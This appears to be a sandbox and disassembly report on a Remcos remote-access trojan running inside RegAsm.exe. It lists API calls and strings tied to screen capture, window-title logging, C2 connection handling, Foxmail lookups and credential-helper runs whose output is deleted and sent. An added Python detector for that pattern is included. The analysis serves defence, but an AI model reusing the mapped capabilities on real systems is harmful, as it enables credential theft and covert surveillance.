  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: 8)3$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$P2$Remcos Agent initialized$Rmc-IAW1Y3$Software\$User$dMG$del$del$exepath$h{3$licence$license_code.txt
• API String ID: 2830904901-2356374855

Control-flow Graph (function at 00418EB1)
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• DeleteDC.GDI32(00000000), ref: 00418F65
• DeleteDC.GDI32(00000000), ref: 00418F68
• DeleteObject.GDI32(00000000), ref: 00418F6B
• SelectObject.GDI32(00000000,00000000), ref: 00418F8C
• DeleteDC.GDI32(00000000), ref: 00418F9D
• DeleteDC.GDI32(00000000), ref: 00418FA0
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetCursorInfo.USER32(?), ref: 00418FE2
• GetIconInfo.USER32 ref: 00418FF8
• DeleteObject.GDI32(?), ref: 00419027
• DeleteObject.GDI32(?), ref: 00419034
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
• GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
• LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
• GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
• DeleteDC.GDI32(?), ref: 004191B7
• DeleteDC.GDI32(00000000), ref: 004191BA
• DeleteObject.GDI32(00000000), ref: 004191BD
• GlobalFree.KERNEL32(?), ref: 004191C8
• DeleteObject.GDI32(00000000), ref: 0041927C
• GlobalFree.KERNELBASE(?), ref: 00419283
• DeleteDC.GDI32(?), ref: 00419293
• DeleteDC.GDI32(00000000), ref: 0041929E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 4256916514-865373369

Control-flow Graph (function at 00414F65)
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,8)3,00000000), ref: 00414FB6
                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                  • String ID: | $%I64u$5.1.3 Pro$8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$P2$Rmc-IAW1Y3$TLS Off$TLS On $dMG$hlight$h{3$name$NG$NG
                                                                                                                                  • API String ID: 524882891-663180811
                                                                                                                                  • Opcode ID: a72eeb24de60c0ea1368a0ec08cfe7818a5c44cf4a835cb23a330527dfdbf037
                                                                                                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                  • Opcode Fuzzy Hash: a72eeb24de60c0ea1368a0ec08cfe7818a5c44cf4a835cb23a330527dfdbf037
                                                                                                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

Control-flow Graph
Control-flow graph (rendered image not preserved): function at 00412AEF, basic blocks 00412AEF-00413267; GetModuleFileNameW at 00412B08, three launch-and-poll rounds each ending in a Sleep (00412C5A, 00412CFC, 00412D9E), three DeleteFileW calls (00412E00, 00412E37, 00412E73), Sleep at 00412E8D, and a back-edge from the Sleep block at 00412ECD to 00412B3A.
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
• Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
• Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
• Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
• Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
• Sleep.KERNEL32(00000064), ref: 00412ECF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
• API String ID: 1223786279-2576077980
• Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
• Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
• Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
• Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
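The function above resolves its own path with GetModuleFileNameW, runs three helpers in turn with the command-line switch `/stext "` (each round polled with Sleep until the child handle is closed), deletes three files with DeleteFileW, sleeps, and then hands the result to a subcall that ends in send. That is the shape of a credential-collection step that writes helper output to disk, ships it, and removes the evidence. The following is an added detection example, not code from the Joe Sandbox report or from Remcos: it runs over constructed Sysmon-style ProcessCreate and FileDelete records and flags a parent that launches `/stext` helpers and then deletes their output. The RegAsm.exe path comes from the report's strings; helper names, the Temp directory, PIDs and timestamps are assumptions.

```python
"""Added detection example; not part of the Joe Sandbox report or of Remcos.

Flags a parent process that launches helpers with a '/stext <file>' switch and then
deletes the helper's output file, the pattern implied by the GetModuleFileNameW ->
'/stext "' -> Sleep -> DeleteFileW sequence at 00412AEF. Events mimic Sysmon
ProcessCreate / FileDelete records but are constructed here; helper and file names,
PIDs and timestamps are assumptions. RegAsm.exe is the host named in the report.
"""
import ntpath
import re
from datetime import datetime, timedelta

SUSPICIOUS_PARENTS = {"regasm.exe"}   # from the report; extending this set is an analyst decision
STEXT_RE = re.compile(r'/stext\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
TMP = r"C:\Users\user\AppData\Local\Temp"          # assumed drop directory


def _pc(ts, pid, ppid, image, parent_image, cmdline):
    return {"ts": ts, "type": "ProcessCreate", "pid": pid, "ppid": ppid,
            "image": image, "parent_image": parent_image, "cmdline": cmdline}


def _fd(ts, pid, image, target):
    return {"ts": ts, "type": "FileDelete", "pid": pid, "image": image, "target": target}


# Constructed sample log: three helpers spawned by the RegAsm.exe host, their outputs
# removed by that same parent shortly after, plus a benign control run from cmd.exe.
SAMPLE_EVENTS = [
    _pc("2024-10-01T09:00:01", 1310, 1300, rf"{TMP}\h1.exe", REGASM,
        rf'"{TMP}\h1.exe" /stext "{TMP}\o1.txt"'),
    _pc("2024-10-01T09:00:03", 1311, 1300, rf"{TMP}\h2.exe", REGASM,
        rf'"{TMP}\h2.exe" /stext "{TMP}\o2.txt"'),
    _pc("2024-10-01T09:00:05", 1312, 1300, rf"{TMP}\h3.exe", REGASM,
        rf'"{TMP}\h3.exe" /stext "{TMP}\o3.txt"'),
    _fd("2024-10-01T09:00:07", 1300, REGASM, rf"{TMP}\o1.txt"),
    _fd("2024-10-01T09:00:07", 1300, REGASM, rf"{TMP}\o2.txt"),
    _fd("2024-10-01T09:00:07", 1300, REGASM, rf"{TMP}\o3.txt"),
    # Benign control: an administrator runs a reporting tool from cmd.exe and keeps the output.
    _pc("2024-10-01T10:00:00", 2000, 1500, r"C:\Tools\audit.exe",
        r"C:\Windows\System32\cmd.exe", r'audit.exe /stext "C:\Tools\report.txt"'),
]


def parse_stext_target(cmdline):
    """Return the output path passed to /stext, or None when the switch is absent."""
    m = STEXT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def _note(findings, helper, reason):
    f = findings.setdefault(helper["pid"], {
        "helper_pid": helper["pid"], "parent_pid": helper["ppid"],
        "parent_image": helper["parent_image"], "cmdline": helper["cmdline"], "reasons": []})
    f["reasons"].append(reason)


def detect(events, window=timedelta(seconds=60)):
    """One finding per /stext helper, listing which of the two conditions fired."""
    findings = {}   # helper pid -> finding
    pending = {}    # lower-cased /stext output path -> helper ProcessCreate event
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "ProcessCreate":
            target = parse_stext_target(ev["cmdline"])
            if target is None:
                continue
            pending[ntpath.normpath(target).lower()] = ev
            # Condition 1: a process that should never spawn such helpers did so.
            if ntpath.basename(ev["parent_image"]).lower() in SUSPICIOUS_PARENTS:
                _note(findings, ev, "stext_child_of_regasm")
        elif ev["type"] == "FileDelete":
            helper = pending.get(ntpath.normpath(ev["target"]).lower())
            if helper is None:
                continue
            # Condition 2: the helper's parent deleted the output file soon after launching it.
            deleted_by_parent = ev["pid"] == helper["ppid"]
            soon = (datetime.fromisoformat(ev["ts"])
                    - datetime.fromisoformat(helper["ts"])) <= window
            if deleted_by_parent and soon:
                _note(findings, helper, "stext_output_deleted_by_parent")
    return [findings[pid] for pid in sorted(findings)]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Either condition alone is worth a look; both together on the same helper, with RegAsm.exe as the parent, is the sequence this function implements. Real Sysmon events need FileDelete logging (Event ID 23 or 26) enabled, and the `/stext` switch should be matched case-insensitively as above, since the sample's string is only the prefix `/stext "`.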

Control-flow Graph
APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Control-flow Graph
Control-flow graph (rendered image not preserved): function at 00414DC1, basic blocks 00414DC1-00414F23; GetSystemDirectoryA at 00414E10, two LoadLibraryA / GetProcAddress(getaddrinfo) / FreeLibrary attempts (00414E52 and 00414EB1), a GetProcAddress loop at 00414ED4-00414EE5, and FreeLibrary at 00414EEF.
This sequence (system directory + "\ws2_32", falling back to "\wship6", then resolving getaddrinfo, getnameinfo and freeaddrinfo) is the WspiapiLoad compatibility shim that the Windows SDK header wspiapi.h inlines into any program built with it for pre-Windows XP Winsock; treat it as SDK boilerplate rather than as a Remcos-specific indicator.
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
• Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1385 4048c8-4048e8 connect 1386 404a1b-404a1f 1385->1386 1387 4048ee-4048f1 1385->1387 1390 404a21-404a2f WSAGetLastError 1386->1390 1391 404a97 1386->1391 1388 404a17-404a19 1387->1388 1389 4048f7-4048fa 1387->1389 1392 404a99-404a9e 1388->1392 1393 404926-404930 call 420cf1 1389->1393 1394 4048fc-404923 call 40531e call 402093 call 41b580 1389->1394 1390->1391 1395 404a31-404a34 1390->1395 1391->1392 1407 404941-40494e call 420f20 1393->1407 1408 404932-40493c 1393->1408 1394->1393 1397 404a71-404a76 1395->1397 1398 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1395->1398 1400 404a7b-404a94 call 402093 * 2 call 41b580 1397->1400 1398->1391 1400->1391 1417 404950-404973 call 402093 * 2 call 41b580 1407->1417 1418 404987-404992 call 421ad1 1407->1418 1408->1400 1447 404976-404982 call 420d31 1417->1447 1431 4049c4-4049d1 call 420e97 1418->1431 1432 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1418->1432 1444 4049d3-4049f6 call 402093 * 2 call 41b580 1431->1444 1445 4049f9-404a14 CreateEventW * 2 1431->1445 1432->1447 1444->1445 1445->1388 1447->1391
                                                                                                                                  APIs
                                                                                                                                  • connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                  • API String ID: 994465650-2151626615

Control-flow Graph

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
• CloseHandle.KERNEL32(?), ref: 00404E4C
• closesocket.WS2_32(000000FF), ref: 00404E5A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
• CloseHandle.KERNEL32(?), ref: 00404EBF
• CloseHandle.KERNEL32(?), ref: 00404EC4
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
• CloseHandle.KERNEL32(?), ref: 00404ED6
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 0040A77B
  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
• GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
• PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: 8)3$P2$pQG$pQG
• API String ID: 3795512280-3716193935

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 0040AD73
• Sleep.KERNEL32(000001F4), ref: 0040AD7E
• GetForegroundWindow.USER32 ref: 0040AD84
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
• GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
• Sleep.KERNEL32(000003E8), ref: 0040AE8F
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425

Control-flow Graph
APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914

Control-flow Graph
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
• __freea.LIBCMT ref: 10008A08
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• __freea.LIBCMT ref: 10008A11
• __freea.LIBCMT ref: 10008A36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID: fYM/
• API String ID: 1414292761-2459865102
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
• StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$8)3$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-3200009476
                                                                                                                                  • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                  • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
